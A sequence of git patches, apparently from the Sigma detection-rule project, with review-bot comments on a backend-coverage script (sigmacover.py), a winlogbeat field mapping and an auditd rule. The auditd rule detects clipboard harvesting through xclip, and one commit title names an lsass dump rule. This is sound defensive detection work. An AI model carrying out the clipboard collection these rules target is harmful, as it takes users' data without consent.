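Review bot: The same `logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile))` line is pasted into all eight except branches of the `@@ -325` hunk, each beside `success = False`; one line after the try/except, `logger.debug("* Convertion Sigma input %s %s" % (sigmafile, "SUCCESS" if success else "FAILURE"))`, replaces them and the `if success :` block of the `@@ -371` hunk for every branch that does not call `sys.exit()`, so only the exiting branches would still need a line of their own. `Convertion` is a misspelling of `Conversion`, and because `contrib/sigmacover.py` later on this page matches this exact text with a regex the wording is now a contract between the two scripts — either fix it in both at once or leave a comment naming the consumer next to the message. `if success :` should read `if success:`. `main()` begins before these hunks and continues after them.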
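Review bot: The new file `rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml` contains only the line `test`, which is not a Sigma rule; any recursive conversion of the rules tree (`sigmac -rI rules`, which `contrib/sigmacover.py` on this page runs for every backend) will now pick it up and report a parse failure for it. Commit the actual rule body, or keep the placeholder out of `rules/` until it exists.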
diff --git a/rules/windows/builtin/win_apt_apt29_tor.yml b/rules-unsupported/win_apt_apt29_tor.yml old mode 100755 new mode 100644 similarity index 100% rename from rules/windows/builtin/win_apt_apt29_tor.yml rename to rules-unsupported/win_apt_apt29_tor.yml From 5e5af2918bb0e1d4ef4ee7bf9929e8b221cf5133 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 26 Sep 2021 11:24:25 +0200 Subject: [PATCH 1114/1367] Add sigmacover.py --- contrib/sigmacover.py | 123 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 123 insertions(+) create mode 100644 contrib/sigmacover.py diff --git a/contrib/sigmacover.py b/contrib/sigmacover.py new file mode 100644 index 00000000..0976b809 --- /dev/null +++ b/contrib/sigmacover.py 
@@ -0,0 +1,123 @@ +# GNU Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . +""" +Project: sigmacover.py +Date: 26/09/2021 +Author: frack113 +Version: 1.0 +Description: + get cover of the rules vs backend + It is more a POC than a script for the moment +Requirements: + $ pip install ruyaml +Todo: + - add output options + - clean code and bug + - better use of subprocess.run + - have idea +""" + + +import re +import subprocess +import pathlib +import ruyaml + + +def get_sigmac(options): + infos = [] + ret = subprocess.run(options,) + log = pathlib.Path("sigmac.log") + with log.open() as f: + lines = f.readlines() + for line in lines: + if "Convertion Sigma input" in line: + info = re.findall("Convertion Sigma input \S+\\\\(\w+\.yml) (\w+)",line)[0] + infos.append(info) + log.unlink() + return infos + +def update_dict(my_dict,my_data,backend): + for file,state in my_data: + my_dict[file][backend] = state + +#the backend dict command line options +backend_dict = { + "ala" : ["python","../tools/sigmac","-t","ala","--debug","-rI","../rules"], + "ala-rule" : ["python","../tools/sigmac","-t","ala-rule","--debug","-rI","../rules"], + "arcsight": ["python","../tools/sigmac","-t","arcsight","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "arcsight-esm": ["python","../tools/sigmac","-t","arcsight-esm","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "carbonblack": ["python","../tools/sigmac","-t","carbonblack","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "chronicle": ["python","../tools/sigmac","-t","chronicle","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "crowdstrike": ["python","../tools/sigmac","-t","crowdstrike","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "csharp" : 
["python","../tools/sigmac","-t","csharp","--debug","-rI","../rules"], + "devo": ["python","../tools/sigmac","-t","devo","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "ee-outliers": ["python","../tools/sigmac","-t","ee-outliers","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "elastalert": ["python","../tools/sigmac","-t","elastalert","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "elastalert-dsl": ["python","../tools/sigmac","-t","elastalert-dsl","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "es-dsl": ["python","../tools/sigmac","-t","es-dsl","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "es-eql": ["python","../tools/sigmac","-t","es-eql","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "es-qs": ["python","../tools/sigmac","-t","es-qs","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "es-qs-lr": ["python","../tools/sigmac","-t","es-qs-lr","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "es-rule": ["python","../tools/sigmac","-t","es-rule","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "es-rule-eql": ["python","../tools/sigmac","-t","es-rule-eql","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "fireeye-helix": ["python","../tools/sigmac","-t","fireeye-helix","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "graylog" : ["python","../tools/sigmac","-t","graylog","--debug","-rI","../rules"], + "grep" : ["python","../tools/sigmac","-t","grep","--debug","-rI","../rules"], + "humio": ["python","../tools/sigmac","-t","humio","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "kibana": ["python","../tools/sigmac","-t","kibana","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "kibana-ndjson": 
["python","../tools/sigmac","-t","kibana-ndjson","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "lacework" : ["python","../tools/sigmac","-t","lacework","--debug","-rI","../rules"], + "limacharlie" : ["python","../tools/sigmac","-t","limacharlie","--debug","-rI","../rules"], + "logiq" : ["python","../tools/sigmac","-t","logiq","--debug","-rI","../rules"], + "logpoint" : ["python","../tools/sigmac","-t","logpoint","--debug","-rI","../rules"], + "mdatp" : ["python","../tools/sigmac","-t","mdatp","--debug","-rI","../rules"], + "netwitness" : ["python","../tools/sigmac","-t","netwitness","--debug","-rI","../rules"], + "netwitness-epl" : ["python","../tools/sigmac","-t","netwitness-epl","--debug","-rI","../rules"], + "opensearch-monitor": ["python","../tools/sigmac","-t","opensearch-monitor","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "powershell" : ["python","../tools/sigmac","-t","powershell","--debug","-rI","../rules"], + "qradar" : ["python","../tools/sigmac","-t","qradar","--debug","-rI","../rules"], + "qualys" : ["python","../tools/sigmac","-t","qualys","--debug","-rI","../rules"], + "sentinel-rule" : ["python","../tools/sigmac","-t","sentinel-rule","--debug","-rI","../rules"], + "splunk": ["python","../tools/sigmac","-t","splunk","-c","../tools/config/splunk-windows.yml","--debug","-rI","../rules"], + "splunkdm": ["python","../tools/sigmac","-t","splunkdm","-c","../tools/config/splunk-windows.yml","--debug","-rI","../rules"], + "splunkxml": ["python","../tools/sigmac","-t","splunkxml","-c","../tools/config/splunk-windows.yml","--debug","-rI","../rules"], + "sql": ["python","../tools/sigmac","-t","sql","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "sqlite": ["python","../tools/sigmac","-t","sqlite","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "stix": ["python","../tools/sigmac","-t","stix","-c","../tools/config/stix2.0.yml","--debug","-rI","../rules"], + 
"sumologic" : ["python","../tools/sigmac","-t","sumologic","--debug","-rI","../rules"], + "sumologic-cse" : ["python","../tools/sigmac","-t","sumologic-cse","--debug","-rI","../rules"], + "sumologic-cse-rule" : ["python","../tools/sigmac","-t","sumologic-cse-rule","--debug","-rI","../rules"], + "sysmon": ["python","../tools/sigmac","-t","stix","-c","../tools/config/sysmon.yml","--debug","-rI","../rules"], + "uberagent" : ["python","../tools/sigmac","-t","uberagent","--debug","-rI","../rules"], + "xpack-watcher": ["python","../tools/sigmac","-t","xpack-watcher","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + } + +print(""" +███ ███ ████ █▄┼▄█ ███ ┼┼ ███ ███ █▄█ ███ ███ +█▄▄ ┼█┼ █┼▄▄ █┼█┼█ █▄█ ┼┼ █┼┼ █┼█ ███ █▄┼ █▄┼ +▄▄█ ▄█▄ █▄▄█ █┼┼┼█ █┼█ ┼┼ ███ █▄█ ┼█┼ █▄▄ █┼█ + v1.0 +please wait during the tests +""") + +#init dict of all rules +default_key_test = {key : "NO TEST" for key in backend_dict.keys()} +the_dico ={} +rules = pathlib.Path("../rules").glob("**/*.yml") +for rule in rules: + the_dico[rule.name] = default_key_test + +#Check all the backend +for name,opt in backend_dict.items(): + print (f"check backend : {name}") + result = get_sigmac(opt) + update_dict(the_dico,result,name) + +#Save +cover = pathlib.Path("sigmacover.yml") +with cover.open("w") as f: + ruyaml.dump(the_dico, f, Dumper=ruyaml.RoundTripDumper) + From 776cccce30475122431250b141ee917555c44e92 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 26 Sep 2021 17:07:58 +0200 Subject: [PATCH 1115/1367] Fix windows10 --- contrib/sigmacover.py | 124 ++++++++++++++++++++++++------------------ 1 file changed, 70 insertions(+), 54 deletions(-) diff --git a/contrib/sigmacover.py b/contrib/sigmacover.py index 0976b809..d498cae2 100644 --- a/contrib/sigmacover.py +++ b/contrib/sigmacover.py 
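Review bot: `the_dico[rule.name] = default_key_test` stores the same dict object under every rule name, so each `my_dict[file][backend] = state` in `update_dict` mutates that one shared dict and the written `sigmacover.yml` reports identical results for every rule; give each rule its own copy, `the_dico[rule.name] = dict(default_key_test)` (the `import copy` added by the following commit suggests this was noticed there). The `"sysmon"` entry passes `"-t","stix"` together with `sysmon.yml`, so the stix backend is exercised a second time and whatever target the key was meant to name is never tested. The log regex is written as `\\\\` in a non-raw string, i.e. it only matches a backslash path separator, and `re.findall(...)[0]` then raises IndexError on the first matching line on any non-Windows host; `r"Convertion Sigma input \S+[\\/](\w+\.yml) (\w+)"` accepts both separators. Keying `the_dico` by `rule.name` alone also silently merges rules that share a file name in different directories.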
@@ -6,11 +6,12 @@ Project: sigmacover.py Date: 26/09/2021 Author: frack113 -Version: 1.0 +Version: 1.1 Description: get cover of the rules vs backend It is more a POC than a script for the moment Requirements: + python 3.7 min $ pip install ruyaml Todo: - add output options @@ -24,11 +25,23 @@ import re import subprocess import pathlib import ruyaml +import copy - -def get_sigmac(options): +def get_sigmac(name,conf): infos = [] - ret = subprocess.run(options,) + if conf == None: + options = ["python","../tools/sigmac","-t",name,"--debug","-rI","-o","dump.txt","../rules"] + else: + options = ["python","../tools/sigmac","-t",name,"-c",conf,"--debug","-rI","-o","dump.txt","../rules"] + si = subprocess.STARTUPINFO() + si.dwFlags |= subprocess.STARTF_USESHOWWINDOW + ret = subprocess.run(options, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + startupinfo=si + ) + if not ret.returncode == 0: + print (f"error {ret.returncode} in sigmac") log = pathlib.Path("sigmac.log") with log.open() as f: lines = f.readlines() @@ -37,6 +50,9 @@ def get_sigmac(options): info = re.findall("Convertion Sigma input \S+\\\\(\w+\.yml) (\w+)",line)[0] infos.append(info) log.unlink() + dump = pathlib.Path("dump.txt") + if dump.exists(): + dump.unlink() return infos def update_dict(my_dict,my_data,backend): 
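Review bot: `subprocess.STARTUPINFO()` and `subprocess.STARTF_USESHOWWINDOW` exist only in the Windows build of `subprocess`, so the rewritten `get_sigmac` in the `@@ -24` hunk now raises AttributeError before running anything on Linux or macOS; build the startup info only where the attribute exists and pass `None` otherwise. `if conf == None:` should be `if conf is None:`. When `ret.returncode` is non-zero the function prints a message and then still opens `sigmac.log`, which may not exist if sigmac failed before configuring its log file, so the error branch should return (or raise) instead of falling through. The regex kept as context in the `@@ -37` hunk still requires a backslash separator, so the script remains Windows-only even with the guard below.

```python
def get_sigmac(name,conf):
    infos = []
    # … unchanged: option list construction …
    startupinfo = None
    if hasattr(subprocess, "STARTUPINFO"):  # Windows-only console-window flag
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
    ret = subprocess.run(options,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT,
                         startupinfo=startupinfo
                         )
    if ret.returncode != 0:
        print (f"error {ret.returncode} in sigmac")
        return infos
    # … unchanged: sigmac.log parsing and dump.txt cleanup …
```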
@@ -45,54 +61,54 @@ def update_dict(my_dict,my_data,backend): #the backend dict command line options backend_dict = { - "ala" : ["python","../tools/sigmac","-t","ala","--debug","-rI","../rules"], - "ala-rule" : ["python","../tools/sigmac","-t","ala-rule","--debug","-rI","../rules"], - "arcsight": ["python","../tools/sigmac","-t","arcsight","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "arcsight-esm": ["python","../tools/sigmac","-t","arcsight-esm","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "carbonblack": ["python","../tools/sigmac","-t","carbonblack","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "chronicle": ["python","../tools/sigmac","-t","chronicle","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "crowdstrike": ["python","../tools/sigmac","-t","crowdstrike","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "csharp" : ["python","../tools/sigmac","-t","csharp","--debug","-rI","../rules"], - "devo": ["python","../tools/sigmac","-t","devo","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "ee-outliers": ["python","../tools/sigmac","-t","ee-outliers","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "elastalert": ["python","../tools/sigmac","-t","elastalert","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "elastalert-dsl": ["python","../tools/sigmac","-t","elastalert-dsl","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "es-dsl": ["python","../tools/sigmac","-t","es-dsl","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "es-eql": ["python","../tools/sigmac","-t","es-eql","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "es-qs": ["python","../tools/sigmac","-t","es-qs","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "es-qs-lr": 
["python","../tools/sigmac","-t","es-qs-lr","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "es-rule": ["python","../tools/sigmac","-t","es-rule","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "es-rule-eql": ["python","../tools/sigmac","-t","es-rule-eql","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "fireeye-helix": ["python","../tools/sigmac","-t","fireeye-helix","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "graylog" : ["python","../tools/sigmac","-t","graylog","--debug","-rI","../rules"], - "grep" : ["python","../tools/sigmac","-t","grep","--debug","-rI","../rules"], - "humio": ["python","../tools/sigmac","-t","humio","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "kibana": ["python","../tools/sigmac","-t","kibana","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "kibana-ndjson": ["python","../tools/sigmac","-t","kibana-ndjson","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "lacework" : ["python","../tools/sigmac","-t","lacework","--debug","-rI","../rules"], - "limacharlie" : ["python","../tools/sigmac","-t","limacharlie","--debug","-rI","../rules"], - "logiq" : ["python","../tools/sigmac","-t","logiq","--debug","-rI","../rules"], - "logpoint" : ["python","../tools/sigmac","-t","logpoint","--debug","-rI","../rules"], - "mdatp" : ["python","../tools/sigmac","-t","mdatp","--debug","-rI","../rules"], - "netwitness" : ["python","../tools/sigmac","-t","netwitness","--debug","-rI","../rules"], - "netwitness-epl" : ["python","../tools/sigmac","-t","netwitness-epl","--debug","-rI","../rules"], - "opensearch-monitor": ["python","../tools/sigmac","-t","opensearch-monitor","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "powershell" : ["python","../tools/sigmac","-t","powershell","--debug","-rI","../rules"], - "qradar" : ["python","../tools/sigmac","-t","qradar","--debug","-rI","../rules"], - 
"qualys" : ["python","../tools/sigmac","-t","qualys","--debug","-rI","../rules"], - "sentinel-rule" : ["python","../tools/sigmac","-t","sentinel-rule","--debug","-rI","../rules"], - "splunk": ["python","../tools/sigmac","-t","splunk","-c","../tools/config/splunk-windows.yml","--debug","-rI","../rules"], - "splunkdm": ["python","../tools/sigmac","-t","splunkdm","-c","../tools/config/splunk-windows.yml","--debug","-rI","../rules"], - "splunkxml": ["python","../tools/sigmac","-t","splunkxml","-c","../tools/config/splunk-windows.yml","--debug","-rI","../rules"], - "sql": ["python","../tools/sigmac","-t","sql","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "sqlite": ["python","../tools/sigmac","-t","sqlite","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "stix": ["python","../tools/sigmac","-t","stix","-c","../tools/config/stix2.0.yml","--debug","-rI","../rules"], - "sumologic" : ["python","../tools/sigmac","-t","sumologic","--debug","-rI","../rules"], - "sumologic-cse" : ["python","../tools/sigmac","-t","sumologic-cse","--debug","-rI","../rules"], - "sumologic-cse-rule" : ["python","../tools/sigmac","-t","sumologic-cse-rule","--debug","-rI","../rules"], - "sysmon": ["python","../tools/sigmac","-t","stix","-c","../tools/config/sysmon.yml","--debug","-rI","../rules"], - "uberagent" : ["python","../tools/sigmac","-t","uberagent","--debug","-rI","../rules"], - "xpack-watcher": ["python","../tools/sigmac","-t","xpack-watcher","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "ala": None, + "ala-rule": None, + "arcsight": "../tools/config/elk-winlogbeat.yml", + "arcsight-esm": "../tools/config/elk-winlogbeat.yml", + "carbonblack": "../tools/config/elk-winlogbeat.yml", + "chronicle": "../tools/config/elk-winlogbeat.yml", + "crowdstrike": "../tools/config/elk-winlogbeat.yml", + "csharp" : None, + "devo": "../tools/config/elk-winlogbeat.yml", + "ee-outliers": "../tools/config/winlogbeat-modules-enabled.yml", 
+ "elastalert": "../tools/config/winlogbeat-modules-enabled.yml", + "elastalert-dsl": "../tools/config/winlogbeat-modules-enabled.yml", + "es-dsl": "../tools/config/winlogbeat-modules-enabled.yml", + "es-eql": "../tools/config/winlogbeat-modules-enabled.yml", + "es-qs": "../tools/config/winlogbeat-modules-enabled.yml", + "es-qs-lr": "../tools/config/logrhythm_winevent.yml", + "es-rule": "../tools/config/winlogbeat-modules-enabled.yml", + "es-rule-eql": "../tools/config/winlogbeat-modules-enabled.yml", + "fireeye-helix": "../tools/config/elk-winlogbeat.yml", + "graylog" : None, + "grep" : None, + "humio": "../tools/config/elk-winlogbeat.yml", + "kibana": "../tools/config/winlogbeat-modules-enabled.yml", + "kibana-ndjson": "../tools/config/winlogbeat-modules-enabled.yml", + "lacework" : None, + "limacharlie" : None, + "logiq" : None, + "logpoint" : None, + "mdatp" : None, + "netwitness" : None, + "netwitness-epl" : None, + "opensearch-monitor": "../tools/config/winlogbeat.yml", + "powershell" : None, + "qradar" : None, + "qualys" : None, + "sentinel-rule" : None, + "splunk": "../tools/config/splunk-windows.yml", + "splunkdm": "../tools/config/splunk-windows.yml", + "splunkxml": "../tools/config/splunk-windows.yml", + "sql": "../tools/config/elk-winlogbeat.yml", + "sqlite": "../tools/config/elk-winlogbeat.yml", + "stix": "../tools/config/stix2.0.yml", + "sumologic" : None, + "sumologic-cse" : None, + "sumologic-cse-rule" : None, + "sysmon": "../tools/config/sysmon.yml", + "uberagent" : None, + "xpack-watcher": "../tools/config/winlogbeat-modules-enabled.yml", } print(""" 
@@ -108,12 +124,12 @@ default_key_test = {key : "NO TEST" for key in backend_dict.keys()} the_dico ={} rules = pathlib.Path("../rules").glob("**/*.yml") for rule in rules: - the_dico[rule.name] = default_key_test + the_dico[rule.name] = copy.deepcopy(default_key_test) #Check all the backend for name,opt in backend_dict.items(): print (f"check backend : {name}") - result = get_sigmac(opt) + result = get_sigmac(name,opt) update_dict(the_dico,result,name) #Save From 8f99625a25b3a1137a47375fcaa4f293dfd3916a Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 26 Sep 2021 18:28:07 +0200 Subject: [PATCH 1116/1367] Fix ubuntu 20 --- contrib/sigmacover.py | 53 ++++++++++++++++++++++++++++++------------- 1 file changed, 37 insertions(+), 16 deletions(-) diff --git a/contrib/sigmacover.py b/contrib/sigmacover.py index d498cae2..3c33e4f2 100644 --- a/contrib/sigmacover.py +++ b/contrib/sigmacover.py @@ -9,12 +9,10 @@ Author: frack113 Version: 1.1 Description: get cover of the rules vs backend - It is more a POC than a script for the moment Requirements: python 3.7 min $ pip install ruyaml Todo: - - add output options - clean code and bug - better use of subprocess.run - have idea @@ -25,7 +23,10 @@ import re import subprocess import pathlib import ruyaml +import json import copy +import platform +import argparse def get_sigmac(name,conf): infos = [] 
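Review bot: `copy.deepcopy(default_key_test)` fixes a real bug (every rule previously shared one result dict, so each backend's result overwrote all rules), and that reason deserves a comment, e.g. `# each rule needs its own dict, otherwise update_dict writes through to all rules`. Since default_key_test is a flat dict of strings, `dict(default_key_test)` would do the same without the new `copy` import, but this is a style preference.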
@@ -33,13 +34,21 @@ def get_sigmac(name,conf): options = ["python","../tools/sigmac","-t",name,"--debug","-rI","-o","dump.txt","../rules"] else: options = ["python","../tools/sigmac","-t",name,"-c",conf,"--debug","-rI","-o","dump.txt","../rules"] - si = subprocess.STARTUPINFO() - si.dwFlags |= subprocess.STARTF_USESHOWWINDOW - ret = subprocess.run(options, - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - startupinfo=si - ) + if platform.system() == "Windows": + si = subprocess.STARTUPINFO() + si.dwFlags |= subprocess.STARTF_USESHOWWINDOW + ret = subprocess.run(options, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + startupinfo=si + ) + my_regex = "Convertion Sigma input \S+\\\\(\w+\.yml) (\w+)" + else: + ret = subprocess.run(options, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + ) + my_regex = "Convertion Sigma input \S+/(\w+\.yml) (\w+)" if not ret.returncode == 0: print (f"error {ret.returncode} in sigmac") log = pathlib.Path("sigmac.log") @@ -47,7 +56,7 @@ def get_sigmac(name,conf): lines = f.readlines() for line in lines: if "Convertion Sigma input" in line: - info = re.findall("Convertion Sigma input \S+\\\\(\w+\.yml) (\w+)",line)[0] + info = re.findall(my_regex,line)[0] infos.append(info) log.unlink() dump = pathlib.Path("dump.txt") @@ -106,7 +115,7 @@ backend_dict = { "sumologic" : None, "sumologic-cse" : None, "sumologic-cse-rule" : None, - "sysmon": "../tools/config/sysmon.yml", + "sysmon": "../tools/config/elk-windows.yml", "uberagent" : None, "xpack-watcher": "../tools/config/winlogbeat-modules-enabled.yml", } 
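Review bot: The two `subprocess.run` calls in the platform branch differ only by the `startupinfo` kwarg, and the two regexes differ only by the path separator, so the branch can shrink to a kwargs dict plus one pattern that accepts both separators; the duplicated call is easy to let drift (the stdout/stderr arguments already have to be kept in sync by hand). The patterns should also be raw strings, as `\S` and `\w` are invalid escapes in ordinary string literals. The enclosing function get_sigmac starts outside the hunk.
```python
    run_kwargs = {"stdout": subprocess.PIPE, "stderr": subprocess.STDOUT}
    if platform.system() == "Windows":
        # STARTF_USESHOWWINDOW with the default wShowWindow keeps the child's console hidden
        si = subprocess.STARTUPINFO()
        si.dwFlags |= subprocess.STARTF_USESHOWWINDOW
        run_kwargs["startupinfo"] = si
    ret = subprocess.run(options, **run_kwargs)
    # one pattern for both path separators instead of a per-platform copy
    my_regex = r"Convertion Sigma input \S+[\\/](\w+\.yml) (\w+)"
    # … unchanged: returncode check, sigmac.log parsing, dump.txt cleanup …
```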
@@ -115,10 +124,17 @@ print(""" ███ ███ ████ █▄┼▄█ ███ ┼┼ ███ ███ █▄█ ███ ███ █▄▄ ┼█┼ █┼▄▄ █┼█┼█ █▄█ ┼┼ █┼┼ █┼█ ███ █▄┼ █▄┼ ▄▄█ ▄█▄ █▄▄█ █┼┼┼█ █┼█ ┼┼ ███ █▄█ ┼█┼ █▄▄ █┼█ - v1.0 + v1.1 bugfix please wait during the tests """) +argparser = argparse.ArgumentParser(description="Check Sigma rules with all backend.") +argparser.add_argument("--target", "-t", choices=["yaml","json"], help="Output target format") +cmdargs = argparser.parse_args() +if cmdargs.target == None: + print("No outpout use -h to see help") + exit() + #init dict of all rules default_key_test = {key : "NO TEST" for key in backend_dict.keys()} the_dico ={} @@ -133,7 +149,12 @@ for name,opt in backend_dict.items(): update_dict(the_dico,result,name) #Save -cover = pathlib.Path("sigmacover.yml") -with cover.open("w") as f: - ruyaml.dump(the_dico, f, Dumper=ruyaml.RoundTripDumper) - +if cmdargs.target.lower() == "yaml": + cover = pathlib.Path("sigmacover.yml") + with cover.open("w") as file: + ruyaml.dump(the_dico, file, Dumper=ruyaml.RoundTripDumper) +else: + cover = pathlib.Path("sigmacover.json") + with cover.open("w") as file: + json_dumps_str = json.dumps(the_dico, indent=4) + file.write(json_dumps_str) From 6a2785492da90e03c0612790dfcdb557c2b5014f Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Mon, 27 Sep 2021 07:59:43 +0200 Subject: [PATCH 1117/1367] Update lnx_auditd_clipboard_collection.yml Changes after suggestion. --- .../lnx_auditd_clipboard_collection.yml | 20 +++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_clipboard_collection.yml b/rules/linux/auditd/lnx_auditd_clipboard_collection.yml index 4f5f3a00..643168b4 100644 --- a/rules/linux/auditd/lnx_auditd_clipboard_collection.yml +++ b/rules/linux/auditd/lnx_auditd_clipboard_collection.yml 
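Review bot: `exit()` in the `if cmdargs.target == None:` guard is the `site` helper and exits with status 0, so a missing `--target` looks like success to any caller that checks the return code. The simplest fix is to drop the guard and let argparse enforce it: `argparser.add_argument("--target", "-t", choices=["yaml","json"], required=True, help="Output target format")`, which prints usage and exits 2 by itself. If the guard stays, use `is None`, `sys.exit(1)`, and fix the typo in the message (`outpout`).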
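Review bot: `cmdargs.target.lower()` in the save block is redundant because argparse's `choices` already restricts the value to exactly `yaml` or `json`; `if cmdargs.target == "yaml":` reads cleaner. The JSON branch can write directly with `json.dump(the_dico, file, indent=4)` instead of building `json_dumps_str` first. Both `cover.open("w")` calls should pass `encoding="utf-8"`: rule file names may contain non-ASCII characters and the default text encoding differs between the Windows and Ubuntu setups this commit series is trying to reconcile.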
@@ -12,16 +12,20 @@ logsource: product: linux service: auditd detection: - xclip: - type: EXECVE - a0: xclip - a1: '-selection' - a2: clipboard - a3: '-o' - condition: xclip + xclip: + type: EXECVE + a0: xclip + a1: + - '-selection' + - '-sel' + a2: + - clipboard + - clip + a3: '-o' + condition: xclip tags: - attack.collection - attack.t1115 falsepositives: - Legitimate usage of xclip tools -level: low \ No newline at end of file +level: low From 6782a7af4d119c999bce62328700441cc13a3e65 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 27 Sep 2021 09:27:01 +0200 Subject: [PATCH 1118/1367] fix TargetUserName and TargetUserSid for detection --- tools/config/winlogbeat-modules-enabled.yml | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index d46dd205..f3c48790 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -468,12 +468,8 @@ fieldmappings: TargetOutboundUserName: winlog.event_data.TargetOutboundUserName TargetServerName: winlog.event_data.TargetServerName TargetSid: winlog.event_data.TargetSid - TargetUserName: - service=security: user.name - default: winlog.event_data.TargetUserName - TargetUserSid: - service=security: user.id - default: winlog.event_data.TargetUserSid + TargetUserName: winlog.event_data.TargetUserName + TargetUserSid: winlog.event_data.TargetUserSid TaskContent: winlog.event_data.TaskContent TaskName: winlog.event_data.TaskName TicketEncryptionType: winlog.event_data.TicketEncryptionType From 5ef1c913cf30ab9da66395a281c56af5068fbe8f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 27 Sep 2021 18:33:57 +0200 Subject: [PATCH 1119/1367] fix: wrong condition https://github.com/SigmaHQ/sigma/issues/2089 --- rules/windows/builtin/win_susp_lsass_dump_generic.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
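Review bot: The detection keys each argv slot positionally (`a1`, `a2`, `a3: '-o'`), so an invocation such as `xclip -o -selection clipboard` or one using `-out` is not matched even though xclip accepts those forms. xclip also accepts abbreviated option names (unique prefixes, as far as I know), so the `-sel`/`clip` spellings added here cannot be exhaustive. If the positional form is a deliberate trade-off, a comment on the selection saying so, and a line under `falsepositives` or the description noting that reordered or further-abbreviated arguments are a known gap, would make that explicit for whoever tunes the rule next.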
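Review bot: Dropping the `service=security` conditional leaves `TargetUserName`/`TargetUserSid` mapped to `winlog.event_data.*` for every channel, and the commit title says this fixes detection without saying what broke; presumably some Security events are not rewritten to `user.name`/`user.id` by the winlogbeat security module, but that is an inference. A comment above the two mappings naming the winlogbeat version and event ids that were checked, e.g. `# plain event_data mapping: the modules pipeline does not populate user.name for all security event ids (verified on <winlogbeat version>)`, would stop the conditional from being reintroduced. The enclosing fieldmappings block starts and ends outside the hunk.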
